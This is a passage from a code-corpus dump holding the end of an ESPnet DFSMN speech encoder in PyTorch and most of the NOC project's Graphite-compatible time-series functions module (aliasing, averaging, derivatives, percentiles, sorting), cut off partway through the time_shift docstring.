[DFSMN(cdim, hdim, cdim, order, stride) for _ in range(2)]\n )\n self.out = torch.nn.Sequential(\n torch.nn.Linear(cdim, hdim),\n torch.nn.ReLU(),\n torch.nn.Linear(hdim, hdim),\n torch.nn.ReLU(),\n torch.nn.Linear(hdim, cdim, bias=False)\n )\n\n def forward(self, xs, masks=None):\n \"\"\"Embed positions in tensor\n\n :param torch.Tensor xs: input tensor\n :param torch.Tensor masks: input mask\n :return: encoder tensor and mask\n :rtype Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n # print('after load: ', xs.shape, xs)\n if xs.size(1) % (self.skip_frame * 2) > 0:\n xs = torch.cat((xs, xs[:,-1:].repeat(1, (self.skip_frame * 2 - (xs.size(1) % (self.skip_frame * 2))), 1)), 1)\n if masks is not None:\n masks = torch.cat((masks, masks[:,-1:].repeat(1, (self.skip_frame * 2 - (masks.size(1) % (self.skip_frame * 2))))), 1)\n xs = self.feature_transform(xs)\n if isinstance(self.subsample, Conv2dSubsampling):\n xs, masks = self.subsample(xs, masks)\n else:\n xs = self.subsample(xs)\n xs = self.fsmn(xs)\n for dfsmn in self.dfsmn1:\n xs = dfsmn(xs)\n self.memory, self.memory_mask = xs, masks\n xs, masks = self.splicesample(xs, masks)\n for dfsmn in self.dfsmn2:\n xs = dfsmn(xs)\n xs = self.out(xs)\n return xs, masks\n","sub_path":"espnet/nets/pytorch_backend/fsmn/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222996641","text":"# -*- coding: utf-8 -*-\n##----------------------------------------------------------------------\n## Graphite-compatible functions\n##----------------------------------------------------------------------\n## Copyright (C) 2007-2014 The NOC Project\n## See LICENSE for details\n##----------------------------------------------------------------------\n\n## Python modules\nfrom collections import defaultdict\nimport math\nimport datetime\nimport random\nimport re\n## Third-party modules\nfrom graphite.attime import 
parseTimeOffset\n## NOC modules\nfrom data import TimeSeries, epoch\nfrom noc.lib.dateutils import total_seconds\nfrom graphite.glyph import format_units\n\nNAN = float('NaN')\nINF = float('inf')\n## Function registry\nfunctions = {}\n\n\ndef api(*names):\n \"\"\"\n Decocator for functions definitions\n \"\"\"\n def decorated(f):\n for name in names:\n functions[name] = f\n return f\n return decorated\n\n\n##\n## Utility functions\n##\ndef format_path(series_list):\n \"\"\"\n Returns a comma-separated list of unique path expressions.\n \"\"\"\n pe = sorted(set([s.pathExpression for s in series_list]))\n return \",\".join(pe)\n\n\ndef normalize(name, series_lists):\n sl = reduce(lambda x, y: x + y, series_lists)\n pe = \"%s(%s)\" % (name, format_path(sl))\n return pe, sl\n\n\ndef is_empty(series_lists):\n return not series_lists or series_lists == ([],)\n\n\ndef get_percentile(points, n, interpolate=False):\n \"\"\"\n Percentile is calculated using the method outlined in the NIST Engineering\n Statistics Handbook:\n http://www.itl.nist.gov/div898/handbook/prc/section2/prc252.htm\n \"\"\"\n sorted_points = sorted(p for p in points if p[0] is not None)\n if len(sorted_points) == 0:\n return None\n fractional_rank = (n/100.0) * (len(sorted_points) + 1)\n rank = int(fractional_rank)\n rank_fraction = fractional_rank - rank\n\n if not interpolate:\n rank += int(math.ceil(rank_fraction))\n\n if rank == 0:\n percentile = sorted_points[0]\n elif rank - 1 == len(sorted_points):\n percentile = sorted_points[-1]\n else:\n percentile = sorted_points[rank - 1] # Adjust for 0-index\n\n if interpolate:\n if rank != len(sorted_points): # if a next value exists\n next_value = sorted_points[rank]\n percentile = percentile + rank_fraction * (next_value - percentile)\n\n return percentile\n\n\n##\n## API Functions (in alphabet order)\n##\n@api(\"absolute\")\ndef absolute(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list and applies the mathematical abs\n function 
to each datapoint transforming it to its absolute value.\n\n Example::\n\n &target=absolute(Server.instance01.threads.busy)\n &target=absolute(Server.instance*.threads.busy)\n \"\"\"\n for series in series_list:\n series.set_name(\"absolute(%s)\" % series.name)\n series.apply(abs)\n return series_list\n\n\n@api(\"alias\")\ndef alias(ctx, series_list, new_name):\n \"\"\"\n Takes one metric or a wildcard series_list and a string in quotes.\n Prints the string instead of the metric name in the legend.\n\n Example::\n\n &target=alias(Sales.widgets.largeBlue,\"Large Blue Widgets\")\n\n \"\"\"\n try:\n series_list.set_name(new_name)\n except AttributeError:\n for series in series_list:\n series.set_name(new_name)\n return series_list\n\n\n@api(\"aliasByNode\")\ndef aliasByNode(ctx, series_list, *nodes):\n \"\"\"\n Takes a series_list and applies an alias derived from one or more \"node\"\n portion/s of the target name. Node indices are 0 indexed.\n\n Example::\n\n &target=aliasByNode(ganglia.*.cpu.load5,1)\n\n \"\"\"\n for series in series_list:\n metric_pieces = re.search(\"(?:.*\\()?(?P[-\\w*\\.]+)(?:,|\\)?.*)?\",\n series.name).groups()[0].split('.')\n series.set_name(\".\".join(metric_pieces[n] for n in nodes))\n return series_list\n\n\n@api(\"aliasByMetric\")\ndef aliasByMetric(ctx, series_list):\n \"\"\"\n Takes a series_list and applies an alias derived from the base metric name.\n\n Example::\n\n &target=aliasByMetric(carbon.agents.graphite.creates)\n\n \"\"\"\n for series in series_list:\n series.set_name(series.name.split(\".\")[-1].split(\",\")[0])\n return series_list\n\n\n@api(\"aliasSub\")\ndef aliasSub(ctx, series_list, search, replace):\n \"\"\"\n Runs series names through a regex search/replace.\n\n Example::\n\n &target=aliasSub(ip.*TCP*,\"^.*TCP(\\d+)\",\"\\\\1\")\n \"\"\"\n try:\n series_list.name = re.sub(search, replace, series_list.name)\n except AttributeError:\n for series in series_list:\n series.name = re.sub(search, replace, series.name)\n 
return series_list\n \n\n@api(\"alpha\")\ndef alpha(ctx, series_list, alpha):\n \"\"\"\n Assigns the given alpha transparency setting to the series. Takes a float\n value between 0 and 1.\n \"\"\"\n for series in series_list:\n series.options['alpha'] = alpha\n return series_list\n\n\n@api(\"averageAbove\")\ndef averageAbove(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by an integer N.\n Out of all metrics passed, draws only the metrics with an average value\n above N for the time period specified.\n\n Example::\n\n &target=averageAbove(server*.instance*.threads.busy,25)\n\n Draws the servers with average values above 25.\n\n \"\"\"\n return [s for s in series_list if s.average() >= n]\n\n\n@api(\"averageBelow\")\ndef averageBelow(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by an integer N.\n Out of all metrics passed, draws only the metrics with an average value\n below N for the time period specified.\n\n Example::\n\n &target=averageBelow(server*.instance*.threads.busy,25)\n\n Draws the servers with average values below 25.\n\n \"\"\"\n return [s for s in series_list if s.average() <= n]\n\n\n@api(\"avg\", \"averageSeries\")\ndef averageSeries(ctx, *series_lists):\n \"\"\"\n Short Alias: avg()\n\n Takes one metric or a wildcard series_list.\n Draws the average value of all metrics passed at each time.\n\n Example::\n\n &target=averageSeries(company.server.*.threads.busy)\n\n \"\"\"\n def avg(p):\n if p:\n return sum(p) / len(p)\n else:\n return None\n\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"averageSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, avg, safe=True)]\n\n\n@api(\"averageSeriesWithWildcards\")\ndef averageSeriesWithWildcards(ctx, series_list, *positions):\n \"\"\"\n Call averageSeries after inserting wildcards at the given position(s).\n\n Example::\n\n &target=averageSeriesWithWildcards(\n 
host.cpu-[0-7].cpu-{user,system}.value, 1)\n\n This would be the equivalent of::\n\n &target=averageSeries(host.*.cpu-user.value)&target=averageSeries(\n host.*.cpu-system.value)\n\n \"\"\"\n matchedList = defaultdict(list)\n for series in series_list:\n newname = '.'.join(map(lambda x: x[1],\n filter(lambda i: i[0] not in positions,\n enumerate(series.name.split('.')))))\n matchedList[newname].append(series)\n result = []\n for name in matchedList:\n [series] = averageSeries(ctx, (matchedList[name]))\n series.set_name(name)\n result.append(series)\n return result\n\n\n@api(\"cactiStyle\")\ndef cactiStyle(ctx, series_list, system=None):\n \"\"\"\n Takes a series list and modifies the aliases to provide column aligned\n output with Current, Max, and Min values in the style of cacti. Optonally\n takes a \"system\" value to apply unit formatting in the same style as the\n Y-axis.\n NOTE: column alignment only works with monospace fonts such as terminus.\n\n Example::\n\n &target=cactiStyle(ganglia.*.net.bytes_out,\"si\")\n\n \"\"\"\n if system:\n fmt = lambda x: \"%.2f%s\" % format_units(x, system=system)\n else:\n fmt = lambda x: \"%.2f\" % x\n l_name = max([0] + [len(series.name) for series in series_list])\n l_last = max([0] + [len(fmt(int(series.last() or 3)))\n for series in series_list]) + 3\n max_len = max([0] + [len(fmt(int(series.max() or 3)))\n for series in series_list]) + 3\n min_len = max([0] + [len(fmt(int(series.min() or 3)))\n for series in series_list]) + 3\n for series in series_list:\n last = series.last()\n maximum = series.max()\n minimum = series.min()\n if last is None:\n last = NAN\n else:\n last = fmt(float(last))\n\n if maximum is None:\n maximum = NAN\n else:\n maximum = fmt(float(maximum))\n if minimum is None:\n minimum = NAN\n else:\n minimum = fmt(float(minimum))\n\n series.name = \"%*s Current:%*s Max:%*s Min:%*s \" % (\n -l_name, series.name, -l_last, last,\n -max_len, maximum, -min_len, minimum)\n return 
series_list\n\n\n@api(\"color\")\ndef color(ctx, series_list, color):\n \"\"\"\n Assigns the given color to the series_list\n\n Example::\n\n &target=color(collectd.hostname.cpu.0.user, 'green')\n &target=color(collectd.hostname.cpu.0.system, 'ff0000')\n &target=color(collectd.hostname.cpu.0.idle, 'gray')\n &target=color(collectd.hostname.cpu.0.idle, '6464ffaa')\n\n \"\"\"\n for series in series_list:\n series.color = color\n return series_list\n\n\n@api(\"dashed\")\ndef dashed(ctx, series_list, dash_length=5):\n \"\"\"\n Takes one metric or a wildcard series_list, followed by a float F.\n\n Draw the selected metrics with a dotted line with segments of length F\n If omitted, the default length of the segments is 5.0\n\n Example::\n\n &target=dashed(server01.instance01.memory.free,2.5)\n\n \"\"\"\n for series in series_list:\n series.set_name(\"dashed(%s, %d)\" % (series.name, dash_length))\n series.options['dashed'] = dash_length\n return series_list\n\n\n@api(\"countSeries\")\ndef countSeries(ctx, *series_lists):\n \"\"\"\n Draws a horizontal line representing the number of nodes found in the\n series_list.\n\n Example::\n\n &target=countSeries(carbon.agents.*.*)\n\n \"\"\"\n def count(a):\n return int(len(a))\n\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"countSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, count, safe=True)]\n\n\n@api(\"derivative\")\ndef derivative(ctx, series_list):\n \"\"\"\n This is the opposite of the integral function. This is useful for taking a\n running total metric and calculating the delta between subsequent data\n points.\n\n This function does not normalize for periods of time, as a true derivative\n would. Instead see the perSecond() function to calculate a rate of change\n over time.\n\n Example::\n\n &target=derivative(company.server.application01.ifconfig.TXPackets)\n\n Each time you run ifconfig, the RX and TXPackets are higher (assuming there\n is network traffic.) 
By applying the derivative function, you can get an\n idea of the packets per minute sent or received, even though you're only\n recording the total.\n \"\"\"\n results = []\n for series in series_list:\n new_values = []\n prev = None\n for val, t in series:\n if None in (prev, val):\n new_values += [(None, t)]\n prev = val\n continue\n new_values += [(val - prev, t)]\n prev = val\n name = \"derivative(%s)\" % series.name\n results += [\n TimeSeries(\"derivative(%s)\" % series.name,\n series.start, series.end, new_values)\n ]\n return results\n\n\n@api(\"diffSeries\")\ndef diffSeries(ctx, *series_lists):\n \"\"\"\n Can take two or more metrics.\n Subtracts parameters 2 through n from parameter 1.\n\n Example::\n\n &target=diffSeries(service.connections.total,\n service.connections.failed)\n\n \"\"\"\n def diff(values):\n return sum(\n [values[0] if values[0] is not None else 0] +\n [-v for v in values[1:] if v is not None]\n )\n\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"diffSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, diff)]\n\n\n@api(\"drawAsInfinite\")\ndef drawAsInfinite(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n If the value is zero, draw the line at 0. If the value is above zero, draw\n the line at infinity. If the value is null or less than zero, do not draw\n the line.\n\n Useful for displaying on/off metrics, such as exit codes. 
(0 = success,\n anything else = failure.)\n\n Example::\n\n drawAsInfinite(Testing.script.exitCode)\n\n \"\"\"\n for series in series_list:\n series.options[\"drawAsInfinite\"] = True\n series.set_name(\"drawAsInfinite(%s)\" % series.name)\n return series_list\n\n\n@api(\"highestAverage\")\ndef highestAverage(ctx, series_list, n=1):\n \"\"\"\n Takes one metric or a wildcard series_list followed by an integer N.\n Out of all metrics passed, draws only the top N metrics with the highest\n average value for the time period specified.\n\n Example::\n\n &target=highestAverage(server*.instance*.threads.busy,5)\n\n Draws the top 5 servers with the highest average value.\n\n \"\"\"\n return sorted(series_list, key=lambda s: s.average())[-n:]\n\n\n@api(\"identity\", \"time\", \"timeFunction\")\ndef identity(ctx, name):\n \"\"\"\n Identity function:\n Returns datapoints where the value equals the timestamp of the datapoint.\n Useful when you have another series where the value is a timestamp, and\n you want to compare it to the time of the datapoint, to render an age\n\n Example::\n\n &target=identity(\"The.time.series\")\n\n This would create a series named \"The.time.series\" that contains points\n where x(t) == t.\n \"\"\"\n step = 60\n start = int(epoch(ctx[\"startTime\"]))\n end = int(epoch(ctx[\"endTime\"]))\n return [\n TimeSeries(\n \"identity(%s)\" % name,\n epoch(ctx[\"startTime\"]),\n epoch(ctx[\"endTime\"]),\n [(t, t) for t in range(start, end, step)]\n )\n ]\n\n\n@api(\"integral\")\ndef integral(ctx, series_list):\n \"\"\"\n This will show the sum over time, sort of like a continuous addition\n function. 
Useful for finding totals or trends in metrics that are\n collected per minute.\n\n Example::\n\n &target=integral(company.sales.perMinute)\n\n This would start at zero on the left side of the graph, adding the sales\n each minute, and show the total sales for the time period selected at the\n right side, (time now, or the time specified by '&until=').\n \"\"\"\n def integrate(v):\n current[0] += v\n return current[0]\n\n for series in series_list:\n current = [0.0]\n series.apply(integrate)\n series.set_name(\"integral(%s)\" % series.name)\n return series_list\n\n\n@api(\"isNonNull\")\ndef isNonNull(ctx, series_list):\n \"\"\"\n Takes a metric or wild card series_list and counts up how many\n non-null values are specified. This is useful for understanding\n which metrics have data at a given point in time (ie, to count\n which servers are alive).\n\n Example::\n\n &target=isNonNull(webapp.pages.*.views)\n\n Returns a series_list where 1 is specified for non-null values, and\n 0 is specified for null values.\n \"\"\"\n\n def indicator(v):\n if v is None:\n return 0\n else:\n return 1\n\n for series in series_list:\n series.apply(indicator, safe=False)\n series.set_name = \"isNonNull(%s)\" % series.name\n return series_list\n\n\n@api(\"invert\")\ndef invert(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list, and inverts each datapoint\n (i.e. 
1/x).\n\n Example::\n\n &target=invert(Server.instance01.threads.busy)\n\n \"\"\"\n for series in series_list:\n series.set_name(\"invert(%s)\" % (series.name))\n series.apply(lambda x: 1 / x if x else None)\n return series_list\n\n\n@api(\"lineWidth\")\ndef lineWidth(ctx, series_list, width):\n \"\"\"\n Takes one metric or a wildcard series_list, followed by a float F.\n\n Draw the selected metrics with a line width of F, overriding the default\n value of 1, or the &lineWidth=X.X parameter.\n\n Useful for highlighting a single metric out of many, or having multiple\n line widths in one graph.\n\n Example::\n\n &target=lineWidth(server01.instance01.memory.free,5)\n\n \"\"\"\n for series in series_list:\n series.options['lineWidth'] = width\n return series_list\n\n\n@api(\"limit\")\ndef limit(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by an integer N.\n\n Only draw the first N metrics. Useful when testing a wildcard in a\n metric.\n\n Example::\n\n &target=limit(server*.instance*.memory.free,5)\n\n Draws only the first 5 instance's memory free.\n\n \"\"\"\n return series_list[0:n]\n\n\n@api(\"log\")\ndef logarithm(ctx, series_list, base=10):\n \"\"\"\n Takes one metric or a wildcard series_list, a base, and draws the y-axis in\n logarithmic format. 
If base is omitted, the function defaults to base 10.\n\n Example::\n\n &target=log(carbon.agents.hostname.avgUpdateTime,2)\n\n \"\"\"\n def l(v):\n if v <= 0:\n return None\n else:\n return math.log(v, base)\n\n base = int(base)\n for series in series_list:\n series.set_name(\"log(%s, %s)\" % (series.name, base))\n series.apply(l)\n return series_list\n\n\n@api(\"lowestAverage\")\ndef lowestAverage(ctx, series_list, n=1):\n \"\"\"\n Takes one metric or a wildcard series_list followed by an integer N.\n Out of all metrics passed, draws only the bottom N metrics with the lowest\n average value for the time period specified.\n\n Example::\n\n &target=lowestAverage(server*.instance*.threads.busy,5)\n\n Draws the bottom 5 servers with the lowest average value.\n\n \"\"\"\n return sorted(series_list, key=lambda s: s.average())[:n]\n\n\n@api(\"map\")\ndef mapSeries(ctx, series_list, mapNode):\n \"\"\"\n Takes a series_list and maps it to a list of sub-series_list. Each\n sub-series_list has the given mapNode in common.\n\n Example::\n\n map(servers.*.cpu.*,1) =>\n [\n servers.server1.cpu.*,\n servers.server2.cpu.*,\n ...\n servers.serverN.cpu.*\n ]\n \"\"\"\n metaSeries = {}\n keys = []\n for series in series_list:\n key = series.name.split(\".\")[mapNode]\n if key not in metaSeries:\n metaSeries[key] = [series]\n keys.append(key)\n else:\n metaSeries[key].append(series)\n return [metaSeries[k] for k in keys]\n\n\n@api(\"maximumAbove\")\ndef maximumAbove(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant n.\n Draws only the metrics with a maximum value above n.\n\n Example::\n\n &target=maximumAbove(system.interface.eth*.packetsSent,1000)\n\n This would only display interfaces which at one point sent more than\n 1000 packets/min.\n \"\"\"\n return [s for s in series_list if s.max() > n]\n\n\n@api(\"maximumBelow\")\ndef maximumBelow(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a 
constant n.\n Draws only the metrics with a maximum value below n.\n\n Example::\n\n &target=maximumBelow(system.interface.eth*.packetsSent,1000)\n\n This would only display interfaces which always sent less than 1000\n packets/min.\n \"\"\"\n return [s for s in series_list if s.max() <= n]\n\n\n@api(\"maxSeries\")\ndef maxSeries(ctx, *series_lists):\n \"\"\"\n Takes one metric or a wildcard series_list. For each datapoint from each\n metric passed in, pick the maximum value and graph it.\n\n Example::\n\n &target=maxSeries(Server*.connections.total)\n\n \"\"\"\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"maxSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, max, safe=True)]\n\n\n@api(\"minumumAbove\")\ndef minimumAbove(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant n.\n Draws only the metrics with a minimum value above n.\n\n Example::\n\n &target=minimumAbove(system.interface.eth*.packetsSent,1000)\n\n This would only display interfaces which always sent more than 1000\n packets/min.\n \"\"\"\n return [s for s in series_list if s.min() > n]\n\n\n@api(\"minimumBelow\")\ndef minimumBelow(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant n.\n Draws only the metrics with a minimum value below n.\n\n Example::\n\n &target=minimumBelow(system.interface.eth*.packetsSent,1000)\n\n This would only display interfaces which sent at one point less than\n 1000 packets/min.\n \"\"\"\n return [s for s in series_list if s.min() <= n]\n\n\n@api(\"minSeries\")\ndef minSeries(ctx, *series_lists):\n \"\"\"\n Takes one metric or a wildcard series_list.\n For each datapoint from each metric passed in, pick the minimum value and\n graph it.\n\n Example::\n\n &target=minSeries(Server*.connections.total)\n \"\"\"\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"minSeries\", series_lists)\n return 
[TimeSeries.fit_map(name, series_lists, min, safe=True)]\n\n\n@api(\"multiplySeries\")\ndef multiplySeries(ctx, *series_lists):\n \"\"\"\n Takes two or more series and multiplies their points. A constant may not be\n used. To multiply by a constant, use the scale() function.\n\n Example::\n\n &target=multiplySeries(Series.dividends,Series.divisors)\n\n\n \"\"\"\n def mul(*factors):\n if None in factors:\n return None\n\n product = 1\n for factor in factors:\n product *= float(factor)\n return product\n\n if is_empty(series_lists):\n return []\n if len(series_lists) == 1:\n return series_lists\n name, series_lists = normalize(\"multiplySeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, mul, safe=True)]\n\n\n@api(\"nonNegativeDerivative\")\ndef nonNegativeDerivative(ctx, series_list, max_value=None):\n \"\"\"\n Same as the derivative function above, but ignores datapoints that trend\n down. Useful for counters that increase for a long time, then wrap or\n reset. (Such as if a network interface is destroyed and recreated by\n unloading and re-loading a kernel module, common with USB / WiFi cards.\n\n Example::\n\n &target=nonNegativederivative(\n company.server.application01.ifconfig.TXPackets)\n\n \"\"\"\n results = []\n\n for series in series_list:\n new_values = []\n prev = None\n for val, t in series:\n if None in (prev, val):\n new_values.append(None)\n prev = val\n continue\n diff = val - prev\n if diff >= 0:\n new_values.append(diff)\n elif max_value is not None and max_value >= val:\n new_values.append((max_value - prev) + val + 1)\n else:\n new_values.append(None)\n prev = val\n results += [\n TimeSeries(\"nonNegativeDerivative(%s)\" % series.name,\n series.start, series.end, new_values)\n ]\n return results\n\n\n@api(\"nPercentile\")\ndef nPercentile(ctx, series_list, n):\n \"\"\"Returns n-percent of each series in the series_list.\"\"\"\n assert n, \"The requested percent is required to be greater than 0\"\n\n results = []\n for s in 
series_list:\n pv = get_percentile(s, n)[0]\n if pv is not None:\n name = \"nPercentile(%s, %g)\" % (s.name, n)\n ps = TimeSeries(\n name, s.start, s.end,\n [(pv, t) for _, t in s]\n )\n ps.pathExpression = name\n results += [ps]\n return results\n\n\n@api(\"offset\")\ndef offset(ctx, series_list, factor):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant, and adds\n the constant to each datapoint.\n\n Example::\n\n &target=offset(Server.instance01.threads.busy,10)\n\n \"\"\"\n factor = float(factor)\n for series in series_list:\n series.set_name(\"offset(%s,%g)\" % (series.name, float(factor)))\n series.apply(lambda x: x + factor)\n return series_list\n\n\n@api(\"offsetToZero\")\ndef offsetToZero(ctx, series_list):\n \"\"\"\n Offsets a metric or wildcard series_list by subtracting the minimum\n value in the series from each datapoint.\n\n Useful to compare different series where the values in each series\n may be higher or lower on average but you're only interested in the\n relative difference.\n\n An example use case is for comparing different round trip time\n results. When measuring RTT (like pinging a server), different\n devices may come back with consistently different results due to\n network latency which will be different depending on how many\n network hops between the probe and the device. To compare different\n devices in the same graph, the network latency to each has to be\n factored out of the results. This is a shortcut that takes the\n fastest response (lowest number in the series) and sets that to zero\n and then offsets all of the other datapoints in that series by that\n amount. 
This makes the assumption that the lowest response is the\n fastest the device can respond, of course the more datapoints that\n are in the series the more accurate this assumption is.\n\n Example::\n\n &target=offsetToZero(Server.instance01.responseTime)\n &target=offsetToZero(Server.instance*.responseTime)\n\n \"\"\"\n for series in series_list:\n series.set_name(\"offsetToZero(%s)\" % series.name)\n sm = series.min()\n for s in series_list:\n s.apply(lambda v: v - sm)\n return series_list\n\n\n@api(\"percentileOfSeries\")\ndef percentileOfSeries(ctx, series_lists, n, interpolate=False):\n \"\"\"\n percentileOfSeries returns a single series which is composed of the\n n-percentile values taken across a wildcard series at each point.\n Unless `interpolate` is set to True, percentile values are actual values\n contained in one of the supplied series.\n \"\"\"\n if n <= 0:\n raise ValueError(\n 'The requested percent is required to be greater than 0')\n\n if not series_lists:\n return []\n _, series_lists = normalize(\"percentileOfSeries\", series_lists)\n name = \"percentileOfSeries(%s,%g)\" % (series_lists[0].pathExpression, n)\n return [\n TimeSeries.fit_map(\n name, series_lists,\n lambda x: get_percentile(x, n, interpolate),\n safe=True\n )\n ]\n\n\n@api(\"randomWalk\", \"randomWalkFunction\")\ndef randomWalkFunction(ctx, name):\n \"\"\"\n Short Alias: randomWalk()\n\n Returns a random walk starting at 0. 
This is great for testing when there\n is no real data in whisper.\n\n Example::\n\n &target=randomWalk(\"The.time.series\")\n\n This would create a series named \"The.time.series\" that contains points\n where x(t) == x(t-1)+random()-0.5, and x(0) == 0.\n \"\"\"\n step = 60\n delta = datetime.timedelta(seconds=step)\n when = ctx[\"startTime\"]\n values = []\n current = 0\n while when < ctx[\"endTime\"]:\n t = epoch(when)\n values += [(current, t)]\n current += random.random() - 0.5\n when += delta\n return [\n TimeSeries(\n \"randomWalk(%s)\" % name,\n epoch(ctx[\"startTime\"]),\n epoch(ctx[\"endTime\"]),\n values\n )\n ]\n\n\n@api(\"rangeOfSeries\")\ndef rangeOfSeries(ctx, *series_lists):\n \"\"\"\n Takes a wildcard series_list.\n Distills down a set of inputs into the range of the series\n\n Example::\n\n &target=rangeOfSeries(Server*.connections.total)\n\n \"\"\"\n def rng(a):\n min_a = min(a)\n max_a = max(a)\n if min_a is None or max_a is None:\n return None\n else:\n return max_a - min_a\n\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"rangeOfSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, rng, safe=True)]\n\n\n@api(\"secondYAxis\")\ndef secondYAxis(ctx, series_list):\n \"\"\"\n Graph the series on the secondary Y axis.\n \"\"\"\n for series in series_list:\n series.options[\"secondYAxis\"] = True\n series.set_name(\"secondYAxis(%s)\" % series.name)\n return series_list\n\n\n@api(\"scale\")\ndef scale(ctx, series_list, factor):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant, and\n multiplies the datapoint by the constant provided at each point.\n\n Example::\n\n &target=scale(Server.instance01.threads.busy,10)\n &target=scale(Server.instance*.threads.busy,10)\n\n \"\"\"\n factor = float(factor)\n for series in series_list:\n series.set_name(\"scale(%s,%g)\" % (series.name, float(factor)))\n series.apply(lambda x: x * factor)\n return series_list\n\n\n@api(\"sin\", 
\"sinFunction\")\ndef sinFunction(ctx, name, amplitude=1):\n \"\"\"\n Short Alias: sin()\n\n Just returns the sine of the current time. The optional amplitude parameter\n changes the amplitude of the wave.\n\n Example::\n\n &target=sin(\"The.time.series\", 2)\n\n This would create a series named \"The.time.series\" that contains sin(x)*2.\n \"\"\"\n step = 60\n delta = datetime.timedelta(seconds=step)\n when = ctx[\"startTime\"]\n values = []\n while when < ctx[\"endTime\"]:\n t = epoch(when)\n values += [(math.sin(t) * amplitude, t)]\n when += delta\n return [\n TimeSeries(\n \"sin(%s)\" % name,\n epoch(ctx[\"startTime\"]),\n epoch(ctx[\"endTime\"]),\n values\n )\n ]\n\n@api(\"sortByName\")\ndef sortByName(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n\n Sorts the list of metrics by the metric name.\n \"\"\"\n return list(sorted(series_list, key=lambda x: x.name))\n\n\n@api(\"sortByTotal\")\ndef sortByTotal(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n\n Sorts the list of metrics by the sum of values across the time period\n specified.\n \"\"\"\n return list(sorted(series_list, key=sum, reverse=True))\n\n\n@api(\"stddevSeries\")\ndef stddevSeries(ctx, *series_lists):\n \"\"\"\n\n Takes one metric or a wildcard series_list.\n Draws the standard deviation of all metrics passed at each time.\n\n Example::\n\n &target=stddevSeries(company.server.*.threads.busy)\n\n \"\"\"\n def stddev(a):\n sm = sum(a)\n ln = len(a)\n avg = sm / ln\n s = 0\n for v in a:\n s += (v - avg) ** 2\n return math.sqrt(s / ln)\n\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"stddevSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, stddev, safe=True)]\n\n\n@api(\"sum\", \"sumSeries\")\ndef sumSeries(ctx, *series_lists):\n \"\"\"\n Short form: sum()\n\n This will add metrics together and return the sum at each datapoint. 
(See\n integral for a sum over time)\n\n Example::\n\n &target=sum(company.server.application*.requestsHandled)\n\n This would show the sum of all requests handled per minute (provided\n requestsHandled are collected once a minute). If metrics with different\n retention rates are combined, the coarsest metric is graphed, and the sum\n of the other metrics is averaged for the metrics with finer retention\n rates.\n\n \"\"\"\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"sumSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, sum, safe=True)]\n\n\n@api(\"sortByMaxima\")\ndef sortByMaxima(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n\n Sorts the list of metrics by the maximum value across the time period\n specified. Useful with the &areaMode=all parameter, to keep the\n lowest value lines visible.\n\n Example::\n\n &target=sortByMaxima(server*.instance*.memory.free)\n\n \"\"\"\n return list(sorted(series_list, key=lambda s: s.max()))\n\n\n@api(\"sortByMinima\")\ndef sortByMinima(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n\n Sorts the list of metrics by the lowest value across the time period\n specified.\n\n Example::\n\n &target=sortByMinima(server*.instance*.memory.free)\n\n \"\"\"\n return list(sorted(series_list, key=lambda s: s.min()))\n\n\n@api(\"sortByTotal\")\ndef sortByTotal(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n\n Sorts the list of metrics by the sum of values across the time period\n specified.\n \"\"\"\n def safe_sum(s):\n return sum(v[0] for v in s if v[0])\n\n return list(sorted(series_list, key=safe_sum, reverse=True))\n\n\n@api(\"time_shift\")\ndef time_shift(ctx, series_list, time_shift, reset_end=True):\n \"\"\"\n Takes one metric or a wildcard series_list, followed by a quoted string\n with the length of time (See ``from / until`` in the render\\_api_ for\n examples of time formats).\n\n Draws the 
